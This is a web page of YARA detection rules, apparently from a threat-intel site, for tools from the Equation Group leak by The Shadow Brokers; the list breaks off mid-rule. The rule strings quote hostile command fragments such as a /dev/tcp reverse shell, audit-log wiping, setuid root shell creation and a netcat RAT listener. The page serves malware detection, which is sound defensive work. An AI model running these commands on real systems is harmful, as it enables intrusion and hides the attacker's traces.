YARA rules for The Shadow Brokers
50 rules · scoped to actor · back to The Shadow Brokers
YARA rules whose family, name, or description matches this actor or its tooling. Use these for binary-pattern hunts.
rule FVEY_ShadowBrokers_Jan17_Screen_Strings {
meta:
description = "Detects strings derived from the ShadowBroker's leak of Windows tools/exploits"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message7/"
date = "2017-01-08"
id = "59832d0a-0cb2-5eb9-a4e2-36aaa09a3998"
strings:
$x1 = "Danderspritz" ascii wide fullword
$x2 = "DanderSpritz" ascii wide fullword
$x3 = "PeddleCheap" ascii wide fullword
$x4 = "ChimneyPool Addres" ascii wide fullword
$a1 = "Getting remote time" fullword ascii
$a2 = "RETRIEVED" fullword ascii
$b1 = "Added Ops library to Python search path" fullword ascii
$b2 = "target: z0.0.0.1" fullword ascii
$c1 = "Psp_Avoidance" fullword ascii
$c2 = "PasswordDump" fullword ascii
$c4 = "EventLogEdit" fullword ascii
$d1 = "Mcl_NtElevation" fullword ascii wide
$d2 = "Mcl_NtNativeApi" fullword ascii wide
$d3 = "Mcl_ThreatInject" fullword ascii wide
$d4 = "Mcl_NtMemory" fullword ascii wide
condition:
filesize < 2000KB and (
1 of ($x*) or
all of ($a*) or
1 of ($b*) or
( uint16(0) == 0x5a4d and 1 of ($c*) ) or
3 of ($c*) or
( uint16(0) == 0x5a4d and 3 of ($d*) )
)
}
rule EquationGroup_emptycriss {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file emptycriss"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "a698d35a0c4d25fd960bd40c1de1022bb0763b77938bf279e91c9330060b0b91"
id = "658a0a2c-ea3a-5531-abea-54f0ed786e79"
strings:
$s1 = "./emptycriss <target IP>" fullword ascii
$s2 = "Cut and paste the following to the telnet prompt:" fullword ascii
$s8 = "environ define TTYPROMPT abcdef" fullword ascii
condition:
( filesize < 50KB and 1 of them )
}
rule EquationGroup_scripme {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file scripme"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "a1adf1c1caad96e7b7fd92cbf419c4cfa13214e66497c9e46ec274a487cd098a"
id = "a2c5cd8b-c104-57d9-9ce2-a0b9a8dd9288"
strings:
$x1 = "running \\\"tcpdump -n -n\\\", on the environment variable \\$INTERFACE, scripted" fullword ascii
$x2 = "Cannot read $opetc/scripme.override -- are you root?" ascii
$x3 = "$ENV{EXPLOIT_SCRIPME}" ascii
$x4 = "$opetc/scripme.override" ascii
condition:
( filesize < 30KB and 1 of them )
}
rule EquationGroup_cryptTool {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file cryptTool"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "96947ad30a2ab15ca5ef53ba8969b9d9a89c48a403e8b22dd5698145ac6695d2"
id = "e1f4e010-9c42-5b8a-8feb-2885b99307fe"
strings:
$s1 = "The encryption key is " fullword ascii
$s2 = "___tempFile2.out" ascii
condition:
( uint16(0) == 0x457f and filesize < 200KB and all of them )
}
rule EquationGroup_dumppoppy {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file dumppoppy"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "4a5c01590063c78d03c092570b3206fde211daaa885caac2ab0d42051d4fc719"
id = "c316aac3-bdd7-5187-8ae2-0a87c2f2d26f"
strings:
$x1 = "Unless the -c (clobber) option is used, if two RETR commands of the" fullword ascii
$x2 = "mywarn(\"End of $destfile determined by \\\"^Connection closed by foreign host\\\"\")" fullword ascii
$l1 = "End of $destfile determined by \"^Connection closed by foreign host"
condition:
( filesize < 20KB and 1 of them )
}
rule EquationGroup_Auditcleaner {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file Auditcleaner"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "8c172a60fa9e50f0df493bf5baeb7cc311baef327431526c47114335e0097626"
id = "39ed798a-221d-5a4b-8809-db01d5241418"
strings:
$x1 = "> /var/log/audit/audit.log; rm -f ." ascii
$x2 = "Pastables to run on target:" ascii
$x3 = "cp /var/log/audit/audit.log .tmp" ascii
$l1 = "Here is the first good cron session from" fullword ascii
$l2 = "No need to clean LOGIN lines." fullword ascii
condition:
( filesize < 300KB and 1 of them )
}
rule EquationGroup_reverse_shell {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file reverse.shell.script"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "d29aa24e6fb9e3b3d007847e1630635d6c70186a36c4ab95268d28aa12896826"
id = "0e9b8ff2-2187-5b61-a086-2ad4ff1a3b10"
strings:
$s1 = "sh >/dev/tcp/" ascii
$s2 = " <&1 2>&1" fullword ascii
condition:
( filesize < 1KB and all of them )
}
rule EquationGroup_tnmunger {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file tnmunger"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "1ab985d84871c54d36ba4d2abd9168c2a468f1ba06994459db06be13ee3ae0d2"
id = "c95dd24f-ffc9-5e58-aed7-205daa001b8c"
strings:
$s1 = "TEST: mungedport=%6d pp=%d unmunged=%6d" fullword ascii
$s2 = "mungedport=%6d pp=%d unmunged=%6d" fullword ascii
condition:
( uint16(0) == 0x457f and filesize < 10KB and 1 of them )
}
rule EquationGroup_ys_ratload {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file ys.ratload.sh"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "a340e5b5cfd41076bd4d6ad89d7157eeac264db97a9dddaae15d935937f10d75"
id = "abd120e7-23f8-530e-b21e-c50a2b571332"
strings:
$x1 = "echo \"example: ${0} -l 192.168.1.1 -p 22222 -x 9999\"" fullword ascii
$x2 = "-x [ port to start mini X server on DEFAULT = 12121 ]\"" fullword ascii
$x3 = "CALLBACK_PORT=32177" fullword ascii
condition:
( uint16(0) == 0x2123 and filesize < 3KB and 1 of them )
}
rule EquationGroup_eh_1_1_0 {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file eh.1.1.0.0"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "0f8dd094516f1be96da5f9addc0f97bcac8f2a348374bd9631aa912344559628"
id = "a6f0ec1f-b0e5-5913-970d-9cdadf647c44"
strings:
$x1 = "usage: %s -e -v -i target IP [-c Cert File] [-k Key File]" fullword ascii
$x2 = "TYPE=licxfer&ftp=%s&source=/var/home/ftp/pub&version=NA&licfile=" ascii
$x3 = "[-l Log File] [-m save MAC time file(s)] [-p Server Port]" fullword ascii
condition:
( uint16(0) == 0x457f and filesize < 100KB and 1 of them )
}
rule EquationGroup_evolvingstrategy_1_0_1 {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file evolvingstrategy.1.0.1.1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "fe70e16715992cc86bbef3e71240f55c7d73815b4247d7e866c845b970233c1b"
id = "465f709b-1791-5b36-836b-7a0c08bb9b88"
strings:
$s1 = "chown root sh; chmod 4777 sh;" fullword ascii
$s2 = "cp /bin/sh .;chown root sh;" fullword ascii
$l1 = "echo clean up when elevated:" fullword ascii
$x1 = "EXE=$DIR/sbin/ey_vrupdate" fullword ascii
condition:
( filesize < 4KB and 1 of them )
}
rule EquationGroup_toast_v3_2_0 {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file toast_v3.2.0.1-linux"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "2ce2d16d24069dc29cf1464819a9dc6deed38d1e5ffc86d175b06ddb691b648b"
id = "776014ae-be94-5d81-bceb-fefb67ee1994"
strings:
$x2 = "Del --- Usage: %s -l file -w wtmp -r user" fullword ascii
$s5 = "Roasting ->%s<- at ->%d:%d<-" ascii
$s6 = "rbnoil -Roasting ->" fullword ascii
condition:
( uint16(0) == 0x457f and filesize < 50KB and 1 of them )
}
rule EquationGroup_sshobo {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file sshobo"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "c7491898a0a77981c44847eb00fb0b186aa79a219a35ebbca944d627eefa7d45"
id = "b9392aec-34a8-5ad2-b3fd-eea907d19701"
strings:
$x1 = "Requested forwarding of port %d but user is not root." fullword ascii
$x2 = "internal error: we do not read, but chan_read_failed for istate" fullword ascii
$x3 = "~# - list forwarded connections" fullword ascii
$x4 = "packet_inject_ignore: block" fullword ascii
condition:
( uint16(0) == 0x457f and filesize < 600KB and all of them )
}
rule EquationGroup_magicjack_v1_1_0_0_client_1_1_0_0 {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file magicjack_v1.1.0.0_client-1.1.0.0.py"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "63292a2353275a3bae012717bb500d5169cd024064a1ce8355ecb4e9bfcdfdd1"
id = "008cb5cf-1d2d-5312-9474-2f93db190974"
strings:
$x1 = "result = self.send_command(\"ls -al %s\" % self.options.DIR)" fullword ascii
$x2 = "cmd += \"D=-l%s \" % self.options.LISTEN_PORT" fullword ascii
condition:
( uint16(0) == 0x2123 and filesize < 80KB and 1 of them )
}
rule EquationGroup_packrat {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file packrat"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "d3e067879c51947d715fc2cf0d8d91c897fe9f50cae6784739b5c17e8a8559cf"
id = "4c0619c4-728f-591f-aa02-7c28f1f42fd1"
strings:
$x2 = "Use this on target to get your RAT:" fullword ascii
$x3 = "$ratremotename && " fullword ascii
$x5 = "$command = \"$nc$bindto -vv -l -p $port < ${ratremotename}\" ;" fullword ascii
condition:
( filesize < 70KB and 1 of them )
}
rule EquationGroup_telex {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file telex"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "e9713b15fc164e0f64783e7a2eac189a40e0a60e2268bd7132cfdc624dfe54ef"
id = "23571734-869d-5d68-9339-d82f168c2e47"
strings:
$x1 = "usage: %s -l [ netcat listener ] [ -p optional target port instead of 23 ] <ip>" fullword ascii
$x2 = "target is not vulnerable. exiting" fullword ascii
$s3 = "Sending final buffer: evil_blocks and shellcode..." fullword ascii
$s4 = "Timeout waiting for daemon to die. Exploit probably failed." fullword ascii
condition:
( uint16(0) == 0x457f and filesize < 50KB and 1 of them )
}
rule EquationGroup_calserver {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file calserver"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "048625e9a0ca46d7fe221e262c8dd05e7a5339990ffae2fb65a9b0d705ad6099"
id = "abe935ee-8579-54f0-b6d3-172d6e2c0482"
strings:
$x1 = "usage: %s <host> <port> e <contents of a local file to be executed on target>" fullword ascii
$x2 = "Writing your %s to target." fullword ascii
$x3 = "(e)xploit, (r)ead, (m)ove and then write, (w)rite" fullword ascii
condition:
( uint16(0) == 0x457f and filesize < 30KB and 1 of them )
}
rule EquationGroup_porkclient {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file porkclient"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "5c14e3bcbf230a1d7e2909876b045e34b1486c8df3c85fb582d9c93ad7c57748"
id = "5b34d5f9-bc76-5cc7-92f7-32c2b7ef7bcf"
strings:
$s1 = "-c COMMAND: shell command string" fullword ascii
$s2 = "Cannot combine shell command mode with args to do socket reuse" fullword ascii
$s3 = "-r: Reuse socket for Nopen connection (requires -t, -d, -f, -n, NO -c)" fullword ascii
condition:
( uint16(0) == 0x457f and filesize < 30KB and 1 of them )
}
rule EquationGroup_electricslide {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file electricslide"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "d27814b725568fa73641e86fa51850a17e54905c045b8b31a9a5b6d2bdc6f014"
id = "5b1e5293-806a-58e6-b865-66025c8d8c32"
strings:
$x1 = "Firing with the same hosts, on altername ports (target is on 8080, listener on 443)" fullword ascii
$x2 = "Recieved Unknown Command Payload: 0x%x" fullword ascii
$x3 = "Usage: eslide [options] <-t profile> <-l listenerip> <targetip>" fullword ascii
$x4 = "-------- Delete Key - Remove a *closed* tab" fullword ascii
condition:
( uint16(0) == 0x457f and filesize < 2000KB and 1 of them )
}
rule EquationGroup_libXmexploit2 {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file libXmexploit2.8"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "d7ed0234d074266cb37dd6a6a60119adb7d75cc6cc3b38654c8951b643944796"
id = "30e94123-acc9-5185-9f5b-1f956c4cf3d1"
strings:
$s1 = "Usage: ./exp command display_to_return_to" fullword ascii
$s2 = "sizeof shellcode = %d" fullword ascii
$s3 = "Execve failed!" fullword ascii
condition:
( uint16(0) == 0x457f and filesize < 40KB and 1 of them )
}
rule EquationGroup_wrap_telnet {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file wrap-telnet.sh"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "4962b307a42ba18e987d82aa61eba15491898978d0e2f0e4beb02371bf0fd5b4"
id = "158e6ebc-6b43-5e94-9052-31408d848875"
strings:
$s1 = "echo \"example: ${0} -l 192.168.1.1 -p 22222 -s 22223 -x 9999\"" fullword ascii
$s2 = "-x [ port to start mini X server on DEFAULT = 12121 ]\"" fullword ascii
$s3 = "echo \"Call back port2 = ${SPORT}\"" fullword ascii
condition:
( uint16(0) == 0x2123 and filesize < 4KB and 1 of them )
}
rule EquationGroup_elgingamble {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file elgingamble"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "0573e12632e6c1925358f4bfecf8c263dd13edf52c633c9109fe3aae059b49dd"
id = "fc8a63a1-9deb-5051-a02d-ed26fd1cae95"
strings:
$x1 = "* * * * * root chown root %s; chmod 4755 %s; %s" fullword ascii
$x2 = "[-] kernel not vulnerable" fullword ascii
$x3 = "[-] failed to spawn shell: %s" fullword ascii
$x4 = "-s shell Use shell instead of %s" fullword ascii
condition:
1 of them
}
rule EquationGroup_cmsd {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file cmsd"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "634c50614e1f5f132f49ae204c4a28f62a32a39a3446084db5b0b49b564034b8"
id = "9cdd3562-fed4-5b79-b056-049279404eeb"
strings:
$x1 = "usage: %s address [-t][-s|-c command] [-p port] [-v 5|6|7]" fullword ascii
$x2 = "error: not vulnerable" fullword ascii
$s1 = "port=%d connected! " fullword ascii
$s2 = "xxx.XXXXXX" fullword ascii
condition:
( uint16(0) == 0x457f and filesize < 30KB and 1 of ($x*) ) or ( 2 of them )
}
rule EquationGroup_ebbshave {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file ebbshave.v5"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "eb5e0053299e087c87c2d5c6f90531cc1946019c85a43a2998c7b66a6f19ca4b"
id = "6d4c14e2-afb1-57ce-91df-cb024258250e"
strings:
$s1 = "executing ./ebbnew_linux -r %s -v %s -A %s %s -t %s -p %s" fullword ascii
$s2 = "./ebbnew_linux.wrapper -o 2 -v 2 -t 192.168.10.4 -p 32772" fullword ascii
$s3 = "version 1 - Start with option #18 first, if it fails then try this option" fullword ascii
$s4 = "%s is a wrapper program for ebbnew_linux exploit for Sparc Solaris RPC services" fullword ascii
condition:
( uint16(0) == 0x457f and filesize < 20KB and 1 of them ) or ( 2 of them )
}
rule EquationGroup_eggbasket {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file eggbasket"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "b078a02963610475217682e6e1d6ae0b30935273ed98743e47cc2553fbfd068f"
id = "3fb1388a-e6b8-5c7a-ad23-ddbfc9d33d56"
strings:
$x1 = "# Building Shellcode into exploit." fullword ascii
$x2 = "%s -w /index.html -v 3.5 -t 10 -c \"/usr/openwin/bin/xterm -d 555.1.2.2:0&\" -d 10.0.0.1 -p 80" fullword ascii
$x3 = "# STARTING EXHAUSTIVE ATTACK AGAINST " fullword ascii
condition:
( uint16(0) == 0x457f and filesize < 90KB and 1 of them ) or ( 2 of them )
}
rule EquationGroup_jparsescan {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file jparsescan"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "8c248eec0af04300f3ba0188fe757850d283de84cf42109638c1c1280c822984"
id = "6b6a884e-0bbc-54f5-bb6c-00e15ca95250"
strings:
$s1 = "Usage: $prog [-f directory] -p prognum [-V ver] [-t proto] -i IPadr" fullword ascii
$s2 = "$gotsunos = ($line =~ /program version netid address service owner/ );" fullword ascii
condition:
( filesize < 40KB and 1 of them )
}
rule EquationGroup_sambal {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file sambal"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "2abf4bbe4debd619b99cb944298f43312db0947217437e6b71b9ea6e9a1a4fec"
id = "b02b442c-3e24-55f8-aa5c-926c3a3a75b4"
strings:
$s1 = "+ Bruteforce mode." fullword ascii
$s3 = "+ Host is not running samba!" fullword ascii
$s4 = "+ connecting back to: [%d.%d.%d.%d:45295]" fullword ascii
$s5 = "+ Exploit failed, try -b to bruteforce." fullword ascii
$s7 = "Usage: %s [-bBcCdfprsStv] [host]" fullword ascii
condition:
( uint16(0) == 0x457f and filesize < 90KB and 1 of them ) or ( 2 of them )
}
rule EquationGroup_pclean_v2_1_1_2 {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file pclean.v2.1.1.0-linux-i386"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "cdb5b1173e6eb32b5ea494c38764b9975ddfe83aa09ba0634c4bafa41d844c97"
id = "1b31af01-8c30-513a-a615-82dcb940e06d"
strings:
$s3 = "** SIGNIFICANTLY IMPROVE PROCESSING TIME" fullword ascii
$s6 = "-c cmd_name: strncmp() search for 1st %d chars of commands that " fullword ascii
condition:
( uint16(0) == 0x457f and filesize < 40KB and all of them )
}
rule EquationGroup_envisioncollision {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file envisioncollision"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "75d5ec573afaf8064f5d516ae61fd105012cbeaaaa09c8c193c7b4f9c0646ea1"
id = "8d512d9a-45a5-514a-bee1-a364beeaf560"
strings:
$x1 = "mysql \\$D --host=\\$H --user=\\$U --password=\\\"\\$P\\\" -e \\\"select * from \\$T" fullword ascii
$x2 = "Window 3: $0 -Uadmin -Ppassword -i127.0.0.1 -Dipboard -c\\\"sleep 500|nc" fullword ascii
$s3 = "$ua->agent(\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\");" fullword ascii
$s4 = "$url = $host . \"/admin/index.php?adsess=\" . $enter . \"&app=core&module=applications§ion=hooks&do=install_hook\";" fullword ascii
condition:
( uint16(0) == 0x2123 and filesize < 20KB and 1 of ($x*) ) or ( 2 of them )
}
rule EquationGroup_cmsex {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file cmsex"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "2d8ae842e7b16172599f061b5b1f223386684a7482e87feeb47a38a3f011b810"
id = "9a1051a5-3f31-5fc2-85a0-beb2dea962d6"
strings:
$x1 = "Usage: %s -i <ip_addr/hostname> -c <command> -T <target_type> (-u <port> | -t <port>) " fullword ascii
$x2 = "-i target ip address / hostname " fullword ascii
$x3 = "Note: Choosing the correct target type is a bit of guesswork." fullword ascii
$x4 = "Solaris rpc.cmsd remote root exploit" fullword ascii
$x5 = "If one choice fails, you may want to try another." fullword ascii
condition:
( uint16(0) == 0x457f and filesize < 50KB and 1 of ($x*) ) or ( 2 of them )
}
rule EquationGroup_exze {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file exze"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "1af6dde6d956db26c8072bf5ff26759f1a7fa792dd1c3498ba1af06426664876"
id = "d452b952-0c4a-501b-93f5-064d13f2c08e"
strings:
$s1 = "shellFile" fullword ascii
$s2 = "completed.1" fullword ascii
$s3 = "zeke_remove" fullword ascii
condition:
( uint16(0) == 0x457f and filesize < 80KB and all of them )
}
rule EquationGroup_DUL {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file DUL"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "24d1d50960d4ebf348b48b4db4a15e50f328ab2c0e24db805b106d527fc5fe8e"
id = "6dd90b30-30cb-531c-b8e2-fc208b21e8e6"
strings:
$x1 = "?Usage: %s <shellcode> <output_file>" fullword ascii
$x2 = "Here is the decoder+(encoded-decoder)+payload" fullword ascii
condition:
( uint16(0) == 0x457f and filesize < 80KB and 1 of them ) or ( all of them )
}
rule EquationGroup_slugger2 {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file slugger2"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "a6a9ab66d73e4b443a80a69ef55a64da7f0af08dfaa7e17eb19c327301a70bdf"
id = "3787a39e-0123-5b46-90c9-6b772b1fd96c"
strings:
$x1 = "usage: %s hostip port cmd [printer_name]" fullword ascii
$x2 = "command must be less than 61 chars" fullword ascii
$s1 = "__rw_read_waiting" ascii
$s2 = "completed.1" fullword ascii
$s3 = "__mutexkind" ascii
$s4 = "__rw_pshared" ascii
condition:
( uint16(0) == 0x457f and filesize < 50KB and ( 4 of them and 1 of ($x*) ) ) or ( all of them )
}
rule EquationGroup_ebbisland {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file ebbisland"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "eba07c98c7e960bb6c71dafde85f5da9f74fd61bc87793c87e04b1ae2d77e977"
id = "d30b9f26-c2c5-5ecb-9f63-e96017788e40"
strings:
$x1 = "Usage: %s [-V] -t <target_ip> -p port" fullword ascii
$x2 = "error - shellcode not as expected - unable to fix up" fullword ascii
$x3 = "WARNING - core wipe mode - this will leave a core file on target" fullword ascii
$x4 = "[-C] wipe target core file (leaves less incriminating core on failed target)" fullword ascii
$x5 = "-A <jumpAddr> (shellcode address)" fullword ascii
$x6 = "*** Insane undocumented incremental port mode!!! ***" fullword ascii
condition:
filesize < 250KB and 1 of them
}
rule EquationGroup_jackpop {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file jackpop"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "0b208af860bb2c7ef6b1ae1fcef604c2c3d15fc558ad8ea241160bf4cbac1519"
id = "7c650752-200b-51e7-95c2-4d385bfd5844"
strings:
$x1 = "%x:%d --> %x:%d %d bytes" fullword ascii
$s1 = "client: can't bind to local address, are you root?" fullword ascii
$s2 = "Unable to register port" fullword ascii
$s3 = "Could not resolve destination" fullword ascii
$s4 = "raw troubles" fullword ascii
condition:
( uint16(0) == 0x457f and filesize < 30KB and 3 of them ) or ( all of them )
}
rule EquationGroup_parsescan {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file parsescan"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "942c12067b0afe9ebce50aa9dfdbf64e6ed0702d9a3a00d25b4fca62a38369ef"
id = "bbe8b518-2bf0-5de4-8fb8-9b8609d393dc"
strings:
$s1 = "$gotgs=1 if (($line =~ /Scan for (Sol|SNMP)\\s+version/) or" fullword ascii
